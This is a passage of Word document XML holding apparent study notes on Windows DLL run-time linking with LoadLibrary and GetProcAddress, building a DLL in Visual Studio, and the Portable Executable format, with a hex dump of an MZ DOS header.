        <w:ind w:left="1800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Run-Time Linking (Dynamic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE5B8B4" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t>typedef VOID (*DLLPROC)(LPTSTR); // Function pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEBC036" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t>HINSTANCE hinstDLL = LoadLibrary("sampleDLL.dll");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4839A3E5" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t>if (hinstDLL != NULL) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66515E95" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="0014205E" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014205E">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">   DLLPROC HelloWorld = (DLLPROC) GetProcAddress(hinstDLL, "HelloWorld");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA66487" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (HelloWorld != NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6B662F" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        HelloWorld(NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3BFC6D" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    FreeLibrary(hinstDLL); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4FDC42" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="0014205E">
        <w:t>More flexible: Load DLL when needed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0014205E">
        <w:t>Works without .lib or .h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C190CB" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="0014205E">
        <w:t xml:space="preserve">Preferred in </w:t>
      </w:r>
      <w:r w:rsidRPr="0014205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>malicious</w:t>
      </w:r>
      <w:r w:rsidRPr="0014205E">
        <w:t xml:space="preserve"> usage because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DC73CA" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t>need</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0110">
        <w:t xml:space="preserve"> function (</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LoadLibrary</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0110">
        <w:t> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LoadLibraryEx</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0110">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0110">
        <w:t>o load the DLL at run time. Once loaded,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0110">
        <w:t>need to use </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GetProcAddress</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0110">
        <w:t xml:space="preserve"> to identify </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0110">
        <w:t>exported DLL function to call</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1953077F" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215347F7" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00EC3EBC" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">Building “.ddl” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FC8462" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C70E05" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00C70E05">
        <w:t>In Visual Studio (Windows):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6F592C" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C70E05" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2160" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C70E05">
        <w:t>Create a Win32 Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BCE851" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C70E05" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2160" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C70E05">
        <w:t>Choose DLL project type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282944AB" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C70E05" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2160" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C70E05">
        <w:t>Add your sampleDLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C70E05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.cpp</w:t>
      </w:r>
      <w:r w:rsidRPr="00C70E05">
        <w:t xml:space="preserve"> and sampleDLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C70E05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523C1469" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C70E05" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2160" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C70E05">
        <w:t>Press Build → Visual Studio creates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E7D423" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C70E05" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2880" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C70E05">
        <w:t>sampleDLL.dll ← the actual compiled library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C2344F" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C70E05" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2880" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C70E05">
        <w:t>sampleDLL.lib ← import library (for static linking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5D7C42" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C70E05" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2880" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C70E05">
        <w:lastRenderedPageBreak/>
        <w:t>sampleDLL.exp ← export info (not always needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F74EDB4" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C70E05" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00C70E05">
        <w:t>The .dll file is placed in your project’s /Debug or /Release folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D00ACC" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F3B306B" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="009535ED" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009535ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Portable Executable Format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBD3988" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00455777" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00455777">
        <w:t>PE is a "file format", defines the structure and layout of data inside .exe or .dll files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32550D3E" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00455777" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00455777">
        <w:t>It’s not a separate file — it’s the blueprint (format) that .exe and .dll files follow so Windows knows how to load and run them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E9E0AA" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00455777" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00455777">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>It like a binary data saved withing .exe, .dll, .sys, …”other windows executables”. that define the structure of the file, so windows can understand the file when try to run or read it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5C84C4" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00455777">
        <w:t>PE (</w:t>
      </w:r>
      <w:r w:rsidRPr="00455777">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00455777">
        <w:t>ortable </w:t>
      </w:r>
      <w:r w:rsidRPr="00455777">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00455777">
        <w:t>xecutable) format defines the information about executable and stored data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, also </w:t>
      </w:r>
      <w:r w:rsidRPr="00455777">
        <w:t>defines the structure of how data components are stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5E3714" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00455777">
        <w:t>PE data is most commonly seen in the hex dump of an executable file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F73FF56" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00455777" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>It’s like meta data about executables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201776DD" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00455777" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="218C1F63" wp14:editId="179CCA92">
            <wp:extent cx="2833499" cy="3347357"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5715"/>
            <wp:docPr id="127969398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3982" name="Picture 3" descr="A diagram of a dia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608" cy="3351029"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F37B010" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00455777">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PE Structure Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566A1CFE" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOS Header: </w:t>
      </w:r>
      <w:r w:rsidRPr="00455777">
        <w:t>defines the type of file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE72B8B" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Ex: if we see the DOS header in hex Dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227E4339" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00DE58BE" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E59F5F" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00DE58BE" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">00000000  4D 5A 90 00 03 00 00 00 04 00 00 00 FF </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>FF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 00 00  </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>MZ</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>..........</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ÿÿ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641FEC28" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00DE58BE" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>00000010  B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ¸.......@.......</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B3A2E8" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00DE58BE" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017D7919" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00DE58BE" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>00000030  00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00  ............è...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459B6D41" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00DE58BE" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>00000040  0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68  ..º..´.Í!¸.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>LÍ!Th</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76BB20CA" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>MZ</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>DOS header</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> defines the file format as </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E5EA4F" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00DE58BE" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DOS Stub: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:t>program run by default at the beginning of a file that prints a compatibility message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265A952B" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PE File Header: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:t>provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">PE header information </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:t>of the binary. Defines the format of the file, contains the signature</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:t>Must be PE\0\0 — tells Windows this is a PE file</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:t xml:space="preserve"> and image file header, NumberOfSections (like .text, .data, etc.).and other information headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C195C7F" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00DE58BE" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
